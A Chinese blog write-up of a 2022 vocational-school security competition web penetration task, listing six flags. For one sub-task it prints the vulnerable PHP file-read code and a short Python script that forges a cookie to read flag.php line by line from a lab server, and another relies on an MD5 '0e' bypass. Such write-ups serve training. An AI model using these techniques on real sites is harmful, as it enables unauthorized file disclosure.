B-8:网页渗透

最新推荐文章于 2024-06-17 20:35:10 发布
最新推荐文章于 2024-06-17 20:35:10 发布
阅读量433 收藏 4
点赞数
分类专栏: # 2022年宁波市中职组“网络安全”赛项 文章标签: 服务器 前端 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_45155797/article/details/130121647
版权 
B-8:网页渗透
任务环境说明:
	服务器场景:Server2127(关闭链接)
	服务器场景操作系统:未知
1.访问服务器网站目录1,根据页面信息完成条件,将页面中的flag提交;
2.访问服务器网站目录2,根据页面信息完成条件,将页面中的flag提交;
3.访问服务器网站目录3,根据页面信息完成条件,将页面中的flag提交;
4.访问服务器网站目录4,根据页面信息完成条件,将页面中的flag提交;
5.访问服务器网站目录5,根据页面信息完成条件,将页面中的flag提交;
6.访问服务器网站目录6,根据页面信息完成条件,将页面中的flag提交;

1.访问服务器网站目录1,根据页面信息完成条件,将页面中的flag提交;


Flag: tXZ1YNjY

2.访问服务器网站目录2,根据页面信息完成条件,将页面中的flag提交;


flag:BS3yfqvJ

3.访问服务器网站目录3,根据页面信息完成条件,将页面中的flag提交;


flag:vSuHmpFn

4.访问服务器网站目录4,根据页面信息完成条件,将页面中的flag提交;


flag:aq6yF68q

5.访问服务器网站目录5,根据页面信息完成条件,将页面中的flag提交;

<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&file=ZmxhZy50eHQ");
$file_list = array(
'0' =>'flag.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['abc']) && $_COOKIE['abc']=='abc'){
$file_list[2]='flag.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
参考:https://www.jianshu.com/p/6d67a3eca18e?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

import requests,sys
cookies = {'abc': 'abc'}
for i in range(0,20):
   url="http://192.168.14.212/5/index.php?line="+str(i)+"&filename=ZmxhZy5waHA="
   flag = requests.get(url, cookies=cookies)
   print(flag.text)


flag:9NIFVXvF

6.访问服务器网站目录6,根据页面信息完成条件,将页面中的flag提交;

0e绕过
常见md5开头为0e:
https://blog.csdn.net/qq_38603541/article/details/97108663


flag:A8And81y

Wh1teSu
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2023年安徽省职业院校“磐云杯”网络安全竞赛
m0_45155797的博客
04-06 210
镜像名:Server2121操作有什么问题,麻烦师傅们指出!
江西 网页渗透-21
zx66661的博客
04-25 879
1.访问服务器网站目录1,根据页面信息完成条件,将获取到的flag提交; 抓包 更改User-Agent:的内容 Flag:zTdKVpUKJu 2.访问服务器网站目录2,根据页面信息完成条件,将获取到的flag提交; 根据题目要求,添加ip,通过抓包获得flag Flag:6i3zXHDPOx 3.访问服务器网站目录3,根据页面信息完成条件,将获取到的flag提交 发现 payload = id=2' or sleep(3)#
2021年江西省“网络安全”赛题B-10:网页渗透—21
依旧是寻觅
09-26 122
,访问服务器网站目录1,根据页面信息完成条件,将获取到的flag提交;
2023年中职“网络安全“—跨站脚本渗透
weixin_57060854的博客
06-02 619
这种题目考的就是过滤,只要多打靶机,做起来还是没有问题的。打XSS-Labs。
2023年宜昌市中职组“网络安全”赛项竞赛任务书-2
旺仔Sec&blog
05-09 795
4.靶机服务器上的网站可能存在文件包含漏洞,要求选手找到文件包含的相关漏洞,与别的漏洞相结合获取一定权限并进行提权;5.操作系统提供的服务可能包含了远程代码执行的漏洞,要求用户找到远程代码执行的服务,并利用此漏洞获取系统权限;2.靶机服务器上的网站可能存在命令注入的漏洞,要求选手找到命令注入的相关漏洞,利用此漏洞获取一定权限;3.靶机服务器上的网站可能存在文件上传漏洞,要求选手找到文件上传的相关漏洞,利用此漏洞获取一定权限;5.系统加固时需要保证靶机对外提供服务的可用性,服务只能更改配置,不允许更改内容;
2021年中职“网络安全“江西省赛题—B-10:网页渗透
weixin_57060854的博客
06-14 2478
学习交流(要环境的可以滴滴),或者遇到不会的可以+qq:3455475542任务环境说明:  服务器场景:Server21  服务器场景操作系统:未知(封闭靶机)  用户名:未知 密码:未知 7. 访问服务器网站目录5,根据页面信息完成条件,将获取到的flag提交;...............
2021年中职“网络安全“江西省赛题—B-8:Web渗透测试
m0_64312309的博客
10-06 2296
2021年中职“网络安全“江西省赛题—B-8:Web渗透测试
Vulnhub-DOLI: 1渗透
laoyanCZ的博客
11-27 1706
点我直接下载靶机。
B-4:服务渗透测试
m0_45155797的博客
04-13 628
B-4:服务渗透测试  服务器场景:Server2209(关闭链接) 1. 使用渗透机对服务器信息收集,并将服务器中网站服务端口号作为flag提交;(若为多个用;隔开) 2. 使用渗透机对服务器信息收集,在服务器网站中找到爬虫文件,并将名称作为flag提交; 3. 使用渗透机对服务器信息收集,在服务器网页中找到flag并将内容提交; 4. 使用渗透机对服务器渗透,并将服务器的主机名作为flag提交; 5. 使用渗透机对服务器渗透,在服务器中找到具有执行权限的文件,在权限的文件中找到flag内容信息并提交
java抓取网页部分源码-web-pentesting:面向Web应用程序测试的Repo
06-05
java网页抓取部分源码 网站渗透测试备忘单 目录 资源 被动侦察 必应 必应 -> ip:79.98.28.23 森思 DnsDumpster 查找子域 金融域 查看 DNS 信息 DNS间谍 安全路线 收割机 theharvester -d example.com -b all 档案...
upload-labs靶场通关指南
07-02
Pass-8:::$DATA 绕过 在 Pass-8 中,我们发现了 ::$DATA 绕过。我们可以在.php 后面加 ::$DATA,然后上传成功。 Pass-9:::$DATA 禁用 在 Pass-9 中,我们发现了 ::$DATA 的禁用。我们可以在.php 后面加点空格点,...
网上购物系统设计-asp.net
02-28
随着Internet的不断普及,人们对于互联网技术的要求已不单单是浏览一下网页,收发电子邮件,日益忙碌的人们开始追求足不出户的利用互联网这一强大的平台来实现的网上购物。对于企业来讲,无论是企业之间(B to B),...
基于pythonnweb渗透测试工具(django)源码
02-24
以B/S结构搭建一款能够渗透检测工具,通过该工具的开发来进行web网页漏洞、web端口扫描的技术实现,通过在线的网站检测来查找网页是否存在漏洞的情况,对于网站达的后期升级、保护有着非常好的帮助作用,可以有效的...
基于Python的渗透测试工具设计系统(django).zip
07-06
所以本次通过以B/S结构搭建一款能够渗透检测工具,通过该工具的开发来进行web网页漏洞、web端口扫描的技术实现,通过在线的网站检测来查找网页是否存在漏洞的情况,对于网站达的后期升级、保护有着非常好的帮助作用...
百度网盘限速解决办法
热门推荐
生活在别处
06-13 1万+
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
Oracle--服务器结构详解
一左的博客
06-17 659
它确保有足够数量的空闲缓冲区(即当服务器进程需要读取数据文件中的块时可以覆盖的缓冲区) 在数据库缓冲区高速缓存中可用。在这个进程中,SMON 读取重做日志文件并将重做日志中记录的更改应用到数据块中。LGWR 向重做日志文件中连续写入直到提交记录含提交记录的所有重做日志缓冲区条目。用来存放Oracle系统最近访问过的数据块,经常或者最近被访问的数据块会被放置到高速数据缓冲区的前端,不经常被访问的会被放置到后端。负责在每当缓冲区高速缓存中的更改永久地记录在数据库中时,更新控制文件和数据文件中的数据库状态信息。
服务器可以充当负载均衡器
m0_75219392的博客
06-17 283
5. 负载均衡和集群支持:服务器可以充当负载均衡器,将网络流量分配到多个服务器节点,提高系统性能。此外,服务器还可以支持集群技术,通过将多个服务器连接在一起,提供高可用性和可扩展性。6. 数据中心和云服务:服务器是数据中心和云服务的核心组件。通过将服务器集中部署在数据中心,可以提供大规模的计算和存储能力,支持各种企业和个人用户的需求。
Ubuntu服务器的GitLab部署
AI相关从业分享
06-17 740
GitLab 是一个基于网页的版本控制系统,它提供Git存储库的管理、代码审查、问题跟踪和活动流等功能。GitLab 由 GitLab Inc. 开发,使用 Ruby 语言编写,并使用 Git 版本控制系统作为其后端。GitLab 提供了与GitHub类似的功能,但重点在于支持内部部署。这意味着公司或组织可以在自己的服务器上部署GitLab,从而完全控制其源代码和协作工具。代码存储和管理:GitLab 提供了强大的代码存储和管理功能,支持多个版本库,允许用户轻松地克隆、推送、拉取和同步代码。
wondershaper 一款限制 linux 服务器网卡级别的带宽工具
最新发布
爱码少年 00fly.online 的博客
06-17 123
奇迹整形器是一个脚本,允许用户限制一个或多个网络适配器的带宽。它通过使用iproute的tc命令来实现这一目的,但极大地简化了操作过程。该工具最初由Bert Hubert在2002年发布,最初的版本缺乏命令行界面,从1.2版本开始增加了此功能。自1.3版起,采用了HTB队列而非CBQ,这在高于10兆比特的高速链路上提供了更好的带宽管理能力。1.4版中实现了改进的入站流量整形方法,并增加了对下载或上传(两者都限制也是可能的)速率设定的能力。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值